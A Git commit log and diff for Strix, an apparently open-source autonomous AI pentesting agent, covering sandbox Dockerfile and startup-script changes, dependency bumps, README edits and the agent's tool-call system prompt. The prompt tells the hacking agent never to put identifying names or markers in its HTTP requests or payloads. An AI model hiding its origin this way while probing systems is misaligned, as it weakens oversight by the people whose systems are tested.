34 Commits

Author SHA1 Message Date
0xallam
86f8835ccb chore: bump version to 0.6.2 and sandbox to 0.1.11 2026-01-18 18:29:44 -08:00
0xallam
2bfb80ff4a refactor: share single browser instance across all agents
- Use singleton browser with isolated BrowserContext per agent instead of
  separate Chromium processes per agent
- Add cleanup logic for stale browser/playwright on reconnect
- Add resource management instructions to browser schema (close tabs/browser when done)
- Suppress Kali login message in Dockerfile
2026-01-18 17:51:23 -08:00
0xallam
7ff0e68466 fix: create fresh gql client per request to avoid transport state issues 2026-01-17 22:19:21 -08:00
0xallam
2ebfd20db5 fix: add telemetry module to Dockerfile for posthog error tracking 2026-01-17 22:19:21 -08:00
0xallam
918a151892 refactor: simplify tool server to asyncio tasks with per-agent isolation
- Replace multiprocessing/threading with single asyncio task per agent
- Add task cancellation: new request cancels previous for same agent
- Add per-agent state isolation via ContextVar for Terminal, Browser, Python managers
- Add posthog telemetry for tool execution errors (timeout, http, sandbox)
- Fix proxy manager singleton pattern
- Increase client timeout buffer over server timeout
- Add context.py to Dockerfile
2026-01-17 22:19:21 -08:00
0xallam
a80ecac7bd fix: run tool server as module to ensure correct sys.path for workers 2026-01-17 22:19:21 -08:00
0xallam
19246d8a5a style: remove redundant sudo -E flag 2026-01-17 22:19:21 -08:00
0xallam
4cb2cebd1e fix: add initial delay and increase retries for tool server health check 2026-01-17 22:19:21 -08:00
0xallam
26b0786a4e fix: replace pgrep with health check for tool server validation 2026-01-17 22:19:21 -08:00
0xallam
61dea7010a refactor: simplify container initialization and fix startup reliability
- Move tool server startup from Python to entrypoint script
- Hardcode Caido port (48080) in entrypoint, remove from Python
- Use /app/venv/bin/python directly instead of poetry run
- Fix env var passing through sudo with sudo -E and explicit vars
- Add Caido process monitoring and logging during startup
- Add retry logic with exponential backoff for token fetch
- Add tool server process validation before declaring ready
- Simplify docker_runtime.py (489 -> 310 lines)
- DRY up container state recovery into _recover_container_state()
- Add container creation retry logic (3 attempts)
- Fix GraphQL health check URL (/graphql/ with trailing slash)
2026-01-17 22:19:21 -08:00
dependabot[bot]
c433d4ffb2 chore(deps): bump pyasn1 from 0.6.1 to 0.6.2
Bumps [pyasn1](https://github.com/pyasn1/pyasn1) from 0.6.1 to 0.6.2.
- [Release notes](https://github.com/pyasn1/pyasn1/releases)
- [Changelog](https://github.com/pyasn1/pyasn1/blob/main/CHANGES.rst)
- [Commits](https://github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2)

---
updated-dependencies:
- dependency-name: pyasn1
  dependency-version: 0.6.2
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-16 15:26:13 -08:00
0xallam
ed6861db64 fix(tool_server): include request_id in worker errors and use get_running_loop
- Add request_id to worker error responses to prevent client hangs
- Replace deprecated get_event_loop() with get_running_loop() in execute_tool
2026-01-16 01:11:02 -08:00
0xallam
a74ed69471 fix(tool_server): use get_running_loop() instead of deprecated get_event_loop() 2026-01-16 01:11:02 -08:00
0xallam
9102b22381 fix(python): prevent stdout/stderr race on timeout
Add cancelled flag to prevent timed-out thread's finally block from
overwriting stdout/stderr when a subsequent execution has already
started capturing output.
2026-01-16 01:11:02 -08:00
0xallam
693ef16060 fix(runtime): parallel tool execution and remove signal handlers
- Add ThreadPoolExecutor in agent_worker for parallel request execution
- Add request_id correlation to prevent response mismatch between concurrent requests
- Add background listener thread per agent to dispatch responses to correct futures
- Add --timeout argument for hard request timeout (default: 120s from config)
- Remove signal handlers from terminal_manager, python_manager, tab_manager (use atexit only)
- Replace SIGALRM timeout in python_instance with threading-based timeout

This fixes requests getting queued behind slow operations and timeouts.
2026-01-16 01:11:02 -08:00
0xallam
8dc6f1dc8f fix(llm): remove hardcoded temperature from dedupe check
Allow the model's default temperature setting to be used instead of
forcing temperature=0 for duplicate detection.
2026-01-15 18:56:48 -08:00
0xallam
4d9154a7f8 fix(config): keep non-LLM saved env values
When LLM env differs, drop only LLM-related saved entries instead of
clearing all saved env vars, preserving other config like API keys.
2026-01-15 18:37:38 -08:00
0xallam
2898db318e fix(config): canonicalize LLM env and respect cleared vars
Drop saved LLM config if any current LLM env var differs, and treat
explicit empty env vars as cleared so saved values are removed and
not re-applied.
2026-01-15 18:37:38 -08:00
0xallam
960bb91790 fix(tui): suppress stderr output in python renderer 2026-01-15 17:44:49 -08:00
0xallam
4de4be683f fix(executor): include error type in httpx RequestError messages
The str() of httpx.RequestError was often empty, making error messages
unhelpful. Now includes the exception type (e.g., ConnectError) for
better debugging.
2026-01-15 17:40:21 -08:00
0xallam
d351b14ae7 docs(tools): add comprehensive multiline examples and remove XML terminology
- Add professional, realistic multiline examples to all tool schemas
- finish_scan: Complete pentest report with SSRF/access control findings
- create_vulnerability_report: Full SSRF writeup with cloud metadata PoC
- file_edit, notes, thinking: Realistic security testing examples
- Remove XML terminology from system prompt and tool descriptions
- All examples use real newlines (not literal \n) to demonstrate correct usage
2026-01-15 17:25:28 -08:00
Ahmed Allam
ceeec8faa8 Update README 2026-01-16 02:34:30 +04:00
0xallam
e5104eb93a chore(release): bump version to 0.6.1 2026-01-14 21:30:14 -08:00
0xallam
d8a08e9a8c chore(prompt): discourage literal \n in tool params 2026-01-14 21:29:06 -08:00
0xallam
f6475cec07 chore(prompt): enforce single tool call per message and remove stop word usage 2026-01-14 19:51:08 -08:00
0xallam
31baa0dfc0 fix: restore ollama_api_base config fallback for Ollama support 2026-01-14 18:54:45 -08:00
0xallam
56526cbf90 fix(agent): fix agent loop hanging and simplify LLM module
- Fix agent loop getting stuck by adding hard stop mechanism
- Add _force_stop flag for immediate task cancellation across threads
- Use thread-safe loop.call_soon_threadsafe for cross-thread cancellation
- Remove request_queue.py (eliminated threading/queue complexity causing hangs)
- Simplify llm.py: direct acompletion calls, cleaner streaming
- Reduce retry wait times to prevent long hangs during retries
- Make timeouts configurable (llm_max_retries, memory_compressor_timeout, sandbox_execution_timeout)
- Keep essential token tracking (input/output/cached tokens, cost, requests)
- Maintain Anthropic prompt caching for system messages
2026-01-14 18:54:45 -08:00
0xallam
47faeb1ef3 fix(agent): use correct agent name in identity instead of class name 2026-01-14 11:24:24 -08:00
0xallam
435ac82d9e chore: add defusedxml dependency 2026-01-14 10:57:32 -08:00
0xallam
f08014cf51 fix(agent): fix tool schemas not retrieved on pyinstaller binary and validate tool call args 2026-01-14 10:57:32 -08:00
dependabot[bot]
bc8e14f68a chore(deps-dev): bump virtualenv from 20.34.0 to 20.36.1
Bumps [virtualenv](https://github.com/pypa/virtualenv) from 20.34.0 to 20.36.1.
- [Release notes](https://github.com/pypa/virtualenv/releases)
- [Changelog](https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst)
- [Commits](https://github.com/pypa/virtualenv/compare/20.34.0...20.36.1)

---
updated-dependencies:
- dependency-name: virtualenv
  dependency-version: 20.36.1
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-13 17:15:58 -08:00
dependabot[bot]
eae2b783c0 chore(deps): bump filelock from 3.20.1 to 3.20.3
Bumps [filelock](https://github.com/tox-dev/py-filelock) from 3.20.1 to 3.20.3.
- [Release notes](https://github.com/tox-dev/py-filelock/releases)
- [Changelog](https://github.com/tox-dev/filelock/blob/main/docs/changelog.rst)
- [Commits](https://github.com/tox-dev/py-filelock/compare/3.20.1...3.20.3)

---
updated-dependencies:
- dependency-name: filelock
  dependency-version: 3.20.3
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-13 17:15:43 -08:00
dependabot[bot]
058cf1abdb chore(deps): bump azure-core from 1.35.0 to 1.38.0
Bumps [azure-core](https://github.com/Azure/azure-sdk-for-python) from 1.35.0 to 1.38.0.
- [Release notes](https://github.com/Azure/azure-sdk-for-python/releases)
- [Commits](https://github.com/Azure/azure-sdk-for-python/compare/azure-core_1.35.0...azure-core_1.38.0)

---
updated-dependencies:
- dependency-name: azure-core
  dependency-version: 1.38.0
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-13 17:15:22 -08:00
Ahmed Allam
d16bdb277a Update README 2026-01-14 05:00:16 +04:00
40 changed files with 1480 additions and 1308 deletions

View File

@@ -1,55 +1,61 @@
<p align="center">
<a href="https://strix.ai/">
<img src=".github/logo.png" width="150" alt="Strix Logo">
<img src="https://github.com/usestrix/.github/raw/main/imgs/cover.png" alt="Strix Banner" width="100%">
</a>
</p>
<h1 align="center">Strix</h1>
<h2 align="center">Open-source AI Hackers to secure your Apps</h2>
<div align="center">
[![Python](https://img.shields.io/pypi/pyversions/strix-agent?color=3776AB)](https://pypi.org/project/strix-agent/)
[![PyPI](https://img.shields.io/pypi/v/strix-agent?color=10b981)](https://pypi.org/project/strix-agent/)
[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](LICENSE)
[![Docs](https://img.shields.io/badge/Docs-docs.strix.ai-10b981.svg)](https://docs.strix.ai)
# Strix
[![GitHub Stars](https://img.shields.io/github/stars/usestrix/strix)](https://github.com/usestrix/strix)
[![Discord](https://img.shields.io/badge/Discord-%235865F2.svg?&logo=discord&logoColor=white)](https://discord.gg/YjKFvEZSdZ)
[![Website](https://img.shields.io/badge/Website-strix.ai-2d3748.svg)](https://strix.ai)
### Open-source AI hackers to find and fix your apps vulnerabilities.
<a href="https://trendshift.io/repositories/15362" target="_blank"><img src="https://trendshift.io/api/badge/repositories/15362" alt="usestrix%2Fstrix | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
<br/>
[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/usestrix/strix)
<a href="https://docs.strix.ai"><img src="https://img.shields.io/badge/Docs-docs.strix.ai-2b9246?style=for-the-badge&logo=gitbook&logoColor=white" alt="Docs"></a>
<a href="https://strix.ai"><img src="https://img.shields.io/badge/Website-strix.ai-3b82f6?style=for-the-badge&logoColor=white" alt="Website"></a>
<a href="https://pypi.org/project/strix-agent/"><img src="https://img.shields.io/badge/PyPI-strix--agent-f59e0b?style=for-the-badge&logo=pypi&logoColor=white" alt="PyPI"></a>
<a href="https://deepwiki.com/usestrix/strix"><img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki"></a>
<a href="https://github.com/usestrix/strix"><img src="https://img.shields.io/github/stars/usestrix/strix?style=flat-square" alt="GitHub Stars"></a>
<a href="LICENSE"><img src="https://img.shields.io/badge/License-Apache%202.0-3b82f6?style=flat-square" alt="License"></a>
<a href="https://pypi.org/project/strix-agent/"><img src="https://img.shields.io/pypi/v/strix-agent?style=flat-square" alt="PyPI Version"></a>
<a href="https://discord.gg/YjKFvEZSdZ"><img src="https://github.com/usestrix/.github/raw/main/imgs/Discord.png" height="40" alt="Join Discord"></a>
<a href="https://x.com/strix_ai"><img src="https://github.com/usestrix/.github/raw/main/imgs/X.png" height="40" alt="Follow on X"></a>
<a href="https://trendshift.io/repositories/15362" target="_blank"><img src="https://trendshift.io/api/badge/repositories/15362" alt="usestrix/strix | Trendshift" width="250" height="55"/></a>
</div>
<br>
<br/>
<div align="center">
<img src=".github/screenshot.png" alt="Strix Demo" width="800" style="border-radius: 16px;">
<img src=".github/screenshot.png" alt="Strix Demo" width="900" style="border-radius: 16px;">
</div>
<br>
> [!TIP]
> **New!** Strix now integrates seamlessly with GitHub Actions and CI/CD pipelines. Automatically scan for vulnerabilities on every pull request and block insecure code before it reaches production!
> **New!** Strix integrates seamlessly with GitHub Actions and CI/CD pipelines. Automatically scan for vulnerabilities on every pull request and block insecure code before it reaches production!
---
## 🦉 Strix Overview
## Strix Overview
Strix are autonomous AI agents that act just like real hackers - they run your code dynamically, find vulnerabilities, and validate them through actual proof-of-concepts. Built for developers and security teams who need fast, accurate security testing without the overhead of manual pentesting or the false positives of static analysis tools.
**Key Capabilities:**
- 🔧 **Full hacker toolkit** out of the box
- 🤝 **Teams of agents** that collaborate and scale
- **Real validation** with PoCs, not false positives
- 💻 **Developerfirst** CLI with actionable reports
- 🔄 **Autofix & reporting** to accelerate remediation
- **Full hacker toolkit** out of the box
- **Teams of agents** that collaborate and scale
- **Real validation** with PoCs, not false positives
- **Developerfirst** CLI with actionable reports
- **Autofix & reporting** to accelerate remediation
## 🎯 Use Cases
@@ -87,7 +93,7 @@ strix --target ./app-directory
> [!NOTE]
> First run automatically pulls the sandbox Docker image. Results are saved to `strix_runs/<run-name>`
## ☁️ Run Strix in Cloud
## Run Strix in Cloud
Want to skip the local setup, API keys, and unpredictable LLM costs? Run the hosted cloud version of Strix at **[app.strix.ai](https://strix.ai)**.
@@ -104,7 +110,7 @@ Launch a scan in just a few minutes—no setup or configuration required—and y
## ✨ Features
### 🛠️ Agentic Security Tools
### Agentic Security Tools
Strix agents come equipped with a comprehensive security testing toolkit:
@@ -116,7 +122,7 @@ Strix agents come equipped with a comprehensive security testing toolkit:
- **Code Analysis** - Static and dynamic analysis capabilities
- **Knowledge Management** - Structured findings and attack documentation
### 🎯 Comprehensive Vulnerability Detection
### Comprehensive Vulnerability Detection
Strix can identify and validate a wide range of security vulnerabilities:
@@ -128,7 +134,7 @@ Strix can identify and validate a wide range of security vulnerabilities:
- **Authentication** - JWT vulnerabilities, session management
- **Infrastructure** - Misconfigurations, exposed services
### 🕸️ Graph of Agents
### Graph of Agents
Advanced multi-agent orchestration for comprehensive security testing:
@@ -138,7 +144,7 @@ Advanced multi-agent orchestration for comprehensive security testing:
---
## 💻 Usage Examples
## Usage Examples
### Basic Usage
@@ -169,7 +175,7 @@ strix --target api.your-app.com --instruction "Focus on business logic flaws and
strix --target api.your-app.com --instruction-file ./instruction.md
```
### 🤖 Headless Mode
### Headless Mode
Run Strix programmatically without interactive UI using the `-n/--non-interactive` flag—perfect for servers and automated jobs. The CLI prints real-time vulnerability findings, and the final report before exiting. Exits with non-zero code when vulnerabilities are found.
@@ -177,7 +183,7 @@ Run Strix programmatically without interactive UI using the `-n/--non-interactiv
strix -n --target https://your-app.com
```
### 🔄 CI/CD (GitHub Actions)
### CI/CD (GitHub Actions)
Strix can be added to your pipeline to run a security test on pull requests with a lightweight GitHub Actions workflow:
@@ -204,7 +210,7 @@ jobs:
run: strix -n -t ./ --scan-mode quick
```
### ⚙️ Configuration
### Configuration
```bash
export STRIX_LLM="openai/gpt-5"
@@ -227,24 +233,25 @@ export STRIX_REASONING_EFFORT="high" # control thinking effort (default: high,
See the [LLM Providers documentation](https://docs.strix.ai/llm-providers/overview) for all supported providers including Vertex AI, Bedrock, Azure, and local models.
## 📚 Documentation
## Documentation
Full documentation is available at **[docs.strix.ai](https://docs.strix.ai)** — including detailed guides for usage, CI/CD integrations, skills, and advanced configuration.
## 🤝 Contributing
## Contributing
We welcome contributions of code, docs, and new skills - check out our [Contributing Guide](https://docs.strix.ai/contributing) to get started or open a [pull request](https://github.com/usestrix/strix/pulls)/[issue](https://github.com/usestrix/strix/issues).
## 👥 Join Our Community
## Join Our Community
Have questions? Found a bug? Want to contribute? **[Join our Discord!](https://discord.gg/YjKFvEZSdZ)**
## 🌟 Support the Project
## Support the Project
**Love Strix?** Give us a ⭐ on GitHub!
## 🙏 Acknowledgements
Strix builds on the incredible work of open-source projects like [LiteLLM](https://github.com/BerriAI/litellm), [Caido](https://github.com/caido/caido), [ProjectDiscovery](https://github.com/projectdiscovery), [Playwright](https://github.com/microsoft/playwright), and [Textual](https://github.com/Textualize/textual). Huge thanks to their maintainers!
## Acknowledgements
Strix builds on the incredible work of open-source projects like [LiteLLM](https://github.com/BerriAI/litellm), [Caido](https://github.com/caido/caido), [Nuclei](https://github.com/projectdiscovery/nuclei), [Playwright](https://github.com/microsoft/playwright), and [Textual](https://github.com/Textualize/textual). Huge thanks to their maintainers!
> [!WARNING]

View File

@@ -9,7 +9,8 @@ RUN apt-get update && \
RUN useradd -m -s /bin/bash pentester && \
usermod -aG sudo pentester && \
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers && \
touch /home/pentester/.hushlogin
RUN mkdir -p /home/pentester/configs \
/home/pentester/wordlists \
@@ -168,9 +169,12 @@ RUN /app/venv/bin/pip install -r /home/pentester/tools/jwt_tool/requirements.txt
RUN echo "# Sandbox Environment" > README.md
COPY strix/__init__.py strix/
COPY strix/config/ /app/strix/config/
COPY strix/utils/ /app/strix/utils/
COPY strix/telemetry/ /app/strix/telemetry/
COPY strix/runtime/tool_server.py strix/runtime/__init__.py strix/runtime/runtime.py /app/strix/runtime/
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py /app/strix/tools/
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py strix/tools/context.py /app/strix/tools/
COPY strix/tools/browser/ /app/strix/tools/browser/
COPY strix/tools/file_edit/ /app/strix/tools/file_edit/

View File

@@ -1,9 +1,12 @@
#!/bin/bash
set -e
if [ -z "$CAIDO_PORT" ]; then
echo "Error: CAIDO_PORT must be set."
exit 1
CAIDO_PORT=48080
CAIDO_LOG="/tmp/caido_startup.log"
if [ ! -f /app/certs/ca.p12 ]; then
echo "ERROR: CA certificate file /app/certs/ca.p12 not found."
exit 1
fi
caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
@@ -11,28 +14,62 @@ caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
--no-logging \
--no-open \
--import-ca-cert /app/certs/ca.p12 \
--import-ca-cert-pass "" > /dev/null 2>&1 &
--import-ca-cert-pass "" > "$CAIDO_LOG" 2>&1 &
CAIDO_PID=$!
echo "Started Caido with PID $CAIDO_PID on port $CAIDO_PORT"
echo "Waiting for Caido API to be ready..."
CAIDO_READY=false
for i in {1..30}; do
if curl -s -o /dev/null http://localhost:${CAIDO_PORT}/graphql; then
echo "Caido API is ready."
if ! kill -0 $CAIDO_PID 2>/dev/null; then
echo "ERROR: Caido process died while waiting for API (iteration $i)."
echo "=== Caido log ==="
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
exit 1
fi
if curl -s -o /dev/null -w "%{http_code}" http://localhost:${CAIDO_PORT}/graphql/ | grep -qE "^(200|400)$"; then
echo "Caido API is ready (attempt $i)."
CAIDO_READY=true
break
fi
sleep 1
done
if [ "$CAIDO_READY" = false ]; then
echo "ERROR: Caido API did not become ready within 30 seconds."
echo "Caido process status: $(kill -0 $CAIDO_PID 2>&1 && echo 'running' || echo 'dead')"
echo "=== Caido log ==="
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
exit 1
fi
sleep 2
echo "Fetching API token..."
TOKEN=$(curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
http://localhost:${CAIDO_PORT}/graphql | jq -r '.data.loginAsGuest.token.accessToken')
TOKEN=""
for attempt in 1 2 3 4 5; do
RESPONSE=$(curl -sL -X POST \
-H "Content-Type: application/json" \
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
http://localhost:${CAIDO_PORT}/graphql)
TOKEN=$(echo "$RESPONSE" | jq -r '.data.loginAsGuest.token.accessToken // empty')
if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ]; then
echo "Successfully obtained API token (attempt $attempt)."
break
fi
echo "Token fetch attempt $attempt failed: $RESPONSE"
sleep $((attempt * 2))
done
if [ -z "$TOKEN" ] || [ "$TOKEN" == "null" ]; then
echo "Failed to get API token from Caido."
curl -s -X POST -H "Content-Type: application/json" -d '{"query":"mutation { loginAsGuest { token { accessToken } } }"}' http://localhost:${CAIDO_PORT}/graphql
echo "ERROR: Failed to get API token from Caido after 5 attempts."
echo "=== Caido log ==="
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
exit 1
fi
@@ -40,7 +77,7 @@ export CAIDO_API_TOKEN=$TOKEN
echo "Caido API token has been set."
echo "Creating a new Caido project..."
CREATE_PROJECT_RESPONSE=$(curl -s -X POST \
CREATE_PROJECT_RESPONSE=$(curl -sL -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation CreateProject { createProject(input: {name: \"sandbox\", temporary: true}) { project { id } } }"}' \
@@ -57,7 +94,7 @@ fi
echo "Caido project created with ID: $PROJECT_ID"
echo "Selecting Caido project..."
SELECT_RESPONSE=$(curl -s -X POST \
SELECT_RESPONSE=$(curl -sL -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation SelectProject { selectProject(id: \"'$PROJECT_ID'\") { currentProject { project { id } } } }"}' \
@@ -114,9 +151,36 @@ sudo -u pentester certutil -N -d sql:/home/pentester/.pki/nssdb --empty-password
sudo -u pentester certutil -A -n "Testing Root CA" -t "C,," -i /app/certs/ca.crt -d sql:/home/pentester/.pki/nssdb
echo "✅ CA added to browser trust store"
echo "Container initialization complete - agents will start their own tool servers as needed"
echo "✅ Shared container ready for multi-agent use"
echo "Starting tool server..."
cd /app
export PYTHONPATH=/app
export STRIX_SANDBOX_MODE=true
export POETRY_VIRTUALENVS_CREATE=false
export TOOL_SERVER_TIMEOUT="${STRIX_SANDBOX_EXECUTION_TIMEOUT:-120}"
TOOL_SERVER_LOG="/tmp/tool_server.log"
sudo -E -u pentester \
poetry run python -m strix.runtime.tool_server \
--token="$TOOL_SERVER_TOKEN" \
--host=0.0.0.0 \
--port="$TOOL_SERVER_PORT" \
--timeout="$TOOL_SERVER_TIMEOUT" > "$TOOL_SERVER_LOG" 2>&1 &
for i in {1..10}; do
if curl -s "http://127.0.0.1:$TOOL_SERVER_PORT/health" | grep -q '"status":"healthy"'; then
echo "✅ Tool server healthy on port $TOOL_SERVER_PORT"
break
fi
if [ $i -eq 10 ]; then
echo "ERROR: Tool server failed to become healthy"
echo "=== Tool server log ==="
cat "$TOOL_SERVER_LOG" 2>/dev/null || echo "(no log)"
exit 1
fi
sleep 1
done
echo "✅ Container ready"
cd /workspace
exec "$@"

44
poetry.lock generated
View File

@@ -379,19 +379,18 @@ files = [
[[package]]
name = "azure-core"
version = "1.35.0"
version = "1.38.0"
description = "Microsoft Azure Core Library for Python"
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "azure_core-1.35.0-py3-none-any.whl", hash = "sha256:8db78c72868a58f3de8991eb4d22c4d368fae226dac1002998d6c50437e7dad1"},
{file = "azure_core-1.35.0.tar.gz", hash = "sha256:c0be528489485e9ede59b6971eb63c1eaacf83ef53001bfe3904e475e972be5c"},
{file = "azure_core-1.38.0-py3-none-any.whl", hash = "sha256:ab0c9b2cd71fecb1842d52c965c95285d3cfb38902f6766e4a471f1cd8905335"},
{file = "azure_core-1.38.0.tar.gz", hash = "sha256:8194d2682245a3e4e3151a667c686464c3786fed7918b394d035bdcd61bb5993"},
]
[package.dependencies]
requests = ">=2.21.0"
six = ">=1.11.0"
typing-extensions = ">=4.6.0"
[package.extras]
@@ -1199,6 +1198,18 @@ files = [
{file = "decorator-5.2.1.tar.gz", hash = "sha256:65f266143752f734b0a7cc83c46f4618af75b8c5911b00ccb61d0ac9b6da0360"},
]
[[package]]
name = "defusedxml"
version = "0.7.1"
description = "XML bomb protection for Python stdlib modules"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
groups = ["main"]
files = [
{file = "defusedxml-0.7.1-py2.py3-none-any.whl", hash = "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61"},
{file = "defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"},
]
[[package]]
name = "dill"
version = "0.4.0"
@@ -1490,14 +1501,14 @@ files = [
[[package]]
name = "filelock"
version = "3.20.1"
version = "3.20.3"
description = "A platform independent file lock."
optional = false
python-versions = ">=3.10"
groups = ["main", "dev"]
files = [
{file = "filelock-3.20.1-py3-none-any.whl", hash = "sha256:15d9e9a67306188a44baa72f569d2bfd803076269365fdea0934385da4dc361a"},
{file = "filelock-3.20.1.tar.gz", hash = "sha256:b8360948b351b80f420878d8516519a2204b07aefcdcfd24912a5d33127f188c"},
{file = "filelock-3.20.3-py3-none-any.whl", hash = "sha256:4b0dda527ee31078689fc205ec4f1c1bf7d56cf88b6dc9426c4f230e46c2dce1"},
{file = "filelock-3.20.3.tar.gz", hash = "sha256:18c57ee915c7ec61cff0ecf7f0f869936c7c30191bb0cf406f1341778d0834e1"},
]
[[package]]
@@ -4845,15 +4856,14 @@ files = [
[[package]]
name = "pyasn1"
version = "0.6.1"
version = "0.6.2"
description = "Pure-Python implementation of ASN.1 types and DER/BER/CER codecs (X.208)"
optional = true
optional = false
python-versions = ">=3.8"
groups = ["main"]
markers = "extra == \"vertex\""
files = [
{file = "pyasn1-0.6.1-py3-none-any.whl", hash = "sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629"},
{file = "pyasn1-0.6.1.tar.gz", hash = "sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034"},
{file = "pyasn1-0.6.2-py3-none-any.whl", hash = "sha256:1eb26d860996a18e9b6ed05e7aae0e9fc21619fcee6af91cca9bad4fbea224bf"},
{file = "pyasn1-0.6.2.tar.gz", hash = "sha256:9b59a2b25ba7e4f8197db7686c09fb33e658b98339fadb826e9512629017833b"},
]
[[package]]
@@ -7095,19 +7105,19 @@ test = ["aiohttp (>=3.10.5)", "flake8 (>=5.0,<6.0)", "mypy (>=0.800)", "psutil",
[[package]]
name = "virtualenv"
version = "20.34.0"
version = "20.36.1"
description = "Virtual Python Environment builder"
optional = false
python-versions = ">=3.8"
groups = ["dev"]
files = [
{file = "virtualenv-20.34.0-py3-none-any.whl", hash = "sha256:341f5afa7eee943e4984a9207c025feedd768baff6753cd660c857ceb3e36026"},
{file = "virtualenv-20.34.0.tar.gz", hash = "sha256:44815b2c9dee7ed86e387b842a84f20b93f7f417f95886ca1996a72a4138eb1a"},
{file = "virtualenv-20.36.1-py3-none-any.whl", hash = "sha256:575a8d6b124ef88f6f51d56d656132389f961062a9177016a50e4f507bbcc19f"},
{file = "virtualenv-20.36.1.tar.gz", hash = "sha256:8befb5c81842c641f8ee658481e42641c68b5eab3521d8e092d18320902466ba"},
]
[package.dependencies]
distlib = ">=0.3.7,<1"
filelock = ">=3.12.2,<4"
filelock = {version = ">=3.20.1,<4", markers = "python_version >= \"3.10\""}
platformdirs = ">=3.9.1,<5"
[package.extras]
@@ -7424,4 +7434,4 @@ vertex = ["google-cloud-aiplatform"]
[metadata]
lock-version = "2.1"
python-versions = "^3.12"
content-hash = "91f49e313e5690bbef87e17730441f26d366daeccb16b5020e03e581fbb9d4d5"
content-hash = "0424a0e82fe49501f3a80166676e257a9dae97093d9bc730489789195f523735"

View File

@@ -1,6 +1,6 @@
[tool.poetry]
name = "strix-agent"
version = "0.6.0"
version = "0.6.2"
description = "Open-source AI Hackers for your apps"
authors = ["Strix <hi@usestrix.com>"]
readme = "README.md"
@@ -69,6 +69,7 @@ gql = { version = "^3.5.3", extras = ["requests"], optional = true }
pyte = { version = "^0.8.1", optional = true }
libtmux = { version = "^0.46.2", optional = true }
numpydoc = { version = "^1.8.0", optional = true }
defusedxml = "^0.7.1"
[tool.poetry.extras]
vertex = ["google-cloud-aiplatform"]

View File

@@ -4,7 +4,7 @@ set -euo pipefail
APP=strix
REPO="usestrix/strix"
STRIX_IMAGE="ghcr.io/usestrix/strix-sandbox:0.1.10"
STRIX_IMAGE="ghcr.io/usestrix/strix-sandbox:0.1.11"
MUTED='\033[0;2m'
RED='\033[0;31m'

View File

@@ -111,7 +111,6 @@ hiddenimports = [
'strix.llm.llm',
'strix.llm.config',
'strix.llm.utils',
'strix.llm.request_queue',
'strix.llm.memory_compressor',
'strix.runtime',
'strix.runtime.runtime',

View File

@@ -16,9 +16,9 @@ CLI OUTPUT:
- NEVER use "Strix" or any identifiable names/markers in HTTP requests, payloads, user-agents, or any inputs
INTER-AGENT MESSAGES:
- NEVER echo inter_agent_message or agent_completion_report XML content that is sent to you in your output.
- Process these internally without displaying the XML
- NEVER echo agent_identity XML blocks; treat them as internal metadata for identity only. Do not include them in outputs or tool calls.
- NEVER echo inter_agent_message or agent_completion_report blocks that are sent to you in your output.
- Process these internally without displaying them
- NEVER echo agent_identity blocks; treat them as internal metadata for identity only. Do not include them in outputs or tool calls.
- Minimize inter-agent messaging: only message when essential for coordination or assistance; avoid routine status updates; batch non-urgent information; prefer parent/child completion flows and shared artifacts over messaging
AUTONOMOUS BEHAVIOR:
@@ -301,24 +301,25 @@ PERSISTENCE IS MANDATORY:
</multi_agent_system>
<tool_usage>
Tool calls use XML format:
Tool call format:
<function=tool_name>
<parameter=param_name>value</parameter>
</function>
CRITICAL RULES:
0. While active in the agent loop, EVERY message you output MUST be a single tool call. Do not send plain text-only responses.
1. One tool call per message
1. Exactly one tool call per message — never include more than one <function>...</function> block in a single LLM message.
2. Tool call must be last in message
3. End response after </function> tag. It's your stop word. Do not continue after it.
4. Use ONLY the exact XML format shown above. NEVER use JSON/YAML/INI or any other syntax for tools or parameters.
5. Tool names must match exactly the tool "name" defined (no module prefixes, dots, or variants).
3. EVERY tool call MUST end with </function>. This is MANDATORY. Never omit the closing tag. End your response immediately after </function>.
4. Use ONLY the exact format shown above. NEVER use JSON/YAML/INI or any other syntax for tools or parameters.
5. When sending ANY multi-line content in tool parameters, use real newlines (actual line breaks). Do NOT emit literal "\n" sequences. Literal "\n" instead of real line breaks will cause tools to fail.
6. Tool names must match exactly the tool "name" defined (no module prefixes, dots, or variants).
- Correct: <function=think> ... </function>
- Incorrect: <thinking_tools.think> ... </function>
- Incorrect: <think> ... </think>
